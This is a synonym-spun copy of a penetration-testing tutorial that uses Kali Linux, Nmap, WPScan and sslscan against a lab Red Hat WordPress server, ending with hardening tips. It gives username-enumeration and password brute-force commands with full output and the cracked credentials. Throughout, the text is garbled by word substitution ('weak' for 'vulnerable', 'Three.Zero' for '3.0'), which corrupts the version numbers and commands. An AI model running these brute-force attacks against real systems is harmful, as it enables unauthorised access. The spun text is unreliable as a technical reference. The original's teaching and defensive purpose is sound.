BreakingExpress

Pen testing with Linux safety instruments

The multitude of well-publicized breaches of enormous client companies underscores the vital significance of system safety administration. Fortunately, there are a lot of totally different purposes that assist safe laptop programs. One is Kali, a Linux distribution developed for safety and penetration testing. This article demonstrates the way to use Kali Linux to analyze your system to search out weaknesses.

Kali installs a variety of instruments, all of that are open supply, and having them put in by default makes issues simpler.

The programs that I will use on this tutorial are:

  1. kali.usersys.redhat.com: This is the system the place I will launch the scans and assaults. It has 30GB of reminiscence and 6 virtualized CPUs (vCPUs).
  2. weak.usersys.redhat.com: This is a Red Hat Enterprise Linux eight system that would be the goal. It has 16GB of reminiscence and 6 vCPUs. This is a comparatively up-to-date system, however some packages is perhaps old-fashioned.
  3. This system additionally contains httpd-2.four.37-30.module+el8.Three.Zero+7001+0766b9e7.x86_64, mariadb-server-10.Three.27-Three.module+el8.Three.Zero+8972+5e3224e9.x86_64, tigervnc-server-1.9.Zero-15.el8_1.x86_64, vsftpd-Three.Zero.Three-32.el8.x86_64, and WordPress model 5.6.1.

I included the hardware specs above as a result of a few of these duties are fairly demanding, particularly for the goal system’s CPU when operating the WordPress Security Scanner (WPScan).

Investigate your system

I began my investigation with a fundamental Nmap scan on my goal system. (You can dive deeper into Nmap by studying Using Nmap results to help harden Linux systems.) An Nmap scan is a fast solution to get an outline of which ports and providers are seen from the system initiating the Nmap scan.

This default scan reveals that there are a number of presumably attention-grabbing open ports. In actuality, any open port is presumably attention-grabbing as a result of it may very well be a method for an attacker to breach your community. In this instance, ports 21, 22, 80, and 443 are good to scan as a result of they’re generally used providers. At this early stage, I am merely doing reconnaissance work and making an attempt to get as a lot details about the goal system as I can.

I need to examine port 80 with Nmap, so I take advantage of the -p 80 argument to take a look at port 80 and -A to get info such because the working system and software model.

Some of the important thing traces on this output are:

PORT   STATE SERVICE VERSION
80/tcp open  http       Apache httpd 2.four.37 ((Red Hat Enterprise Linux))
|_http-generator: WordPress 5.6.1

Since I now know it is a WordPress server, I can use WPScan to get details about potential weaknesses. A very good investigation to run is to attempt to discover some usernames. Using --enumerate u tells WPScan to search for customers within the WordPress occasion. For instance:

┌──(root?kali)-[~]
└─# wpscan --url weak.usersys.redhat.com --enumerate u
_______________________________________________________________
        __              _______   _____
            / /  __ / ____|
         /  / /| |__) | (___   ___  __ _ _ __ ®
        /  / / |  ___/ ___ / __|/ _` | '_
                 /  /  | |   ____) | (__| (_| | | | |
                /  /   |_|    |_____/ ___|__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                        Version Three.eight.10
        Sponsored by Automattic - https://automattic.com/
        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
[+] Started: Tue Feb 16 21:38:49 2021

Interesting Finding(s):
...
[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] pgervase
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

This reveals there are two customers: admin and pgervase. I will attempt to guess the password for admin by utilizing a password dictionary, which is a textual content file with plenty of attainable passwords. The dictionary I used was 37G and had Three,543,076,137 traces.

Like there are a number of textual content editors, internet browsers, and different purposes you possibly can select from, there are a number of instruments obtainable to launch password assaults. Here are two instance instructions utilizing Nmap and WPScan:

# nmap -sV --script http-wordpress-brute --script-args userdb=customers.txt,passdb=/path/to/passworddb,threads=6 weak.usersys.redhat.com
# wpscan --url weak.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt

This Nmap script is considered one of many attainable scripts I might have used, and scanning the URL with WPScan is only one of many attainable duties this device can do. You can resolve which you’d choose to make use of

This WPScan instance reveals the password on the finish of the file:

┌──(root?kali)-[~]
└─# wpscan --url weak.usersys.redhat.com --passwords passwords.txt --usernames admin
_______________________________________________________________
        __              _______   _____
            / /  __ / ____|
         /  / /| |__) | (___   ___  __ _ _ __ ®
        /  / / |  ___/ ___ / __|/ _` | '_
                 /  /  | |   ____) | (__| (_| | | | |
                /  /   |_|    |_____/ ___|__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                        Version Three.eight.10
        Sponsored by Automattic - https://automattic.com/
        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
[+] Started: Thu Feb 18 20:32:13 2021

Interesting Finding(s):

…..

[+] Performing password assault on Wp Login towards 1 consumer/s
Trying admin / redhat Time: 00:01:57 <==================================================================================================================> (3231 / 3231) 100.00% Time: 00:01:57
Trying admin / redhat Time: 00:01:57 <=========================================================                                                         > (3231 / 6462) 50.00%  ETA: ??:??:??
[SUCCESS] - admin / redhat                                                                                                                                                                      

[!] Valid Combinations Found:
 | Username: admin, Password: redhat

[!] No WPVulnDB API Token given, consequently vulnerability information has not been output.
[!] You can get a free API token with 50 every day requests by registering at https://wpscan.com/register

[+] Finished: Thu Feb 18 20:34:15 2021
[+] Requests Done: 3255
[+] Cached Requests: 34
[+] Data Sent: 1.066 MB
[+] Data Received: 24.513 MB
[+] Memory used: 264.023 MB
[+] Elapsed time: 00:02:02

The Valid Combinations Found part close to the tip accommodates the admin username and password. It took solely two minutes to undergo Three,231 traces.

I’ve one other dictionary file with Three,238,659,984 distinctive entries, which might take for much longer and depart much more proof.

Using Nmap produces a end result a lot sooner:

┌──(root?kali)-[~]
└─# nmap -sV --script http-wordpress-brute --script-args userdb=customers.txt,passdb=password.txt,threads=6 weak.usersys.redhat.com
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 20:48 EST
Nmap scan report for weak.usersys.redhat.com (10.19.47.242)
Host is up (Zero.00015s latency).
Not proven: 995 closed ports
PORT    STATE SERVICE VERSION
21/tcp   open  ftp      vsftpd Three.Zero.Three
22/tcp   open  ssh      OpenSSH eight.Zero (protocol 2.Zero)
80/tcp   open  http     Apache httpd 2.four.37 ((Red Hat Enterprise Linux))
|_http-server-header: Apache/2.four.37 (Red Hat Enterprise Linux)
| http-wordpress-brute:
|   Accounts:
|       admin:redhat - Valid credentials              <<<<<<<
|       pgervase:redhat - Valid credentials         <<<<<<<
|_  Statistics: Performed 6 guesses in 1 seconds, common tps: 6.Zero
111/tcp  open  rpcbind 2-four (RPC #100000)
| rpcinfo:
|   program model     port/proto  service
|   100000  2,Three,four       111/tcp   rpcbind
|   100000  2,Three,four       111/udp   rpcbind
|   100000  Three,four         111/tcp6  rpcbind
|_  100000  Three,four         111/udp6  rpcbind
3306/tcp open  mysql   MySQL 5.5.5-10.Three.27-MariaDB
MAC Address: 52:54:00:8C:A1:C0 (QEMU digital NIC)
Service Info: OS: Unix

Service detection carried out. Please report any incorrect outcomes at https://nmap.org/submit/ .
Nmap achieved: 1 IP deal with (1 host up) scanned in 7.68 seconds

However, operating a scan like this could depart a flood of HTTPD logging messages on the goal system:

10.19.47.170 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"

To get details about the HTTPS server present in my preliminary Nmap scan, I used the sslscan command:

┌──(root?kali)-[~]
└─# sslscan weak.usersys.redhat.com
Version: 2.Zero.6-static
OpenSSL 1.1.1i-dev  xx XXX xxxx

Connected to 10.19.47.242

Testing SSL server weak.usersys.redhat.com on port 443 utilizing SNI identify weak.usersys.redhat.com

  SSL/TLS Protocols:
SSLv2   disabled
SSLv3   disabled
TLSv1.Zero   disabled
TLSv1.1   disabled
TLSv1.2   enabled
TLSv1.Three   enabled
<snip>

This reveals details about the enabled SSL protocols and, additional down within the output, details about the Heartbleed vulnerability:

  Heartbleed:
TLSv1.Three not weak to heartbleed
TLSv1.2 not weak to heartbleed

Tips for stopping or mitigating attackers

There are some ways to defend your programs towards the multitude of attackers on the market. Just a few key factors are:

  • Know your programs: This contains figuring out which ports are open, what ports must be open, who ought to be capable to see these open ports, and what’s the anticipated site visitors on these providers. Nmap is a good device to study programs on the community.
  • Use present finest practices: What is taken into account a finest apply at present won’t be a finest apply down the street. As an admin, it is essential to remain updated on traits within the infosec realm.
  • Know the way to use your merchandise: For instance, quite than letting an attacker frequently hammer away at your WordPress system, block their IP deal with and restrict the variety of occasions they’ll attempt to log in earlier than getting blocked. Blocking the IP deal with won’t be as useful in the true world as a result of attackers are seemingly to make use of compromised programs to launch assaults. However, it is a straightforward setting to allow and will block some assaults.
  • Maintain and confirm good backups: If an attacker includes a number of of your programs, having the ability to rebuild from identified good and clear backups might save plenty of money and time.
  • Check your logs: As the examples above present, scanning and penetration instructions might depart plenty of logs indicating that an attacker is focusing on the system. If you discover them, you possibly can take preemptive motion to mitigate the danger.
  • Update your programs, their purposes, and any additional modules: As NIST Special Publication 800-40r3 explains, “patches are usually the most effective way to mitigate software flaw vulnerabilities, and are often the only fully effective solution.”
  • Use the instruments your distributors present: Vendors have totally different instruments that will help you keep their programs, so be sure to make the most of them. For instance, Red Hat Insights, included with Red Hat Enterprise Linux subscriptions, may also help tune your programs and provide you with a warning to potential safety threats.

Learn extra

This introduction to safety instruments and the way to use them is simply the tip of the iceberg. To dive deeper, you would possibly need to look into the next assets:

Exit mobile version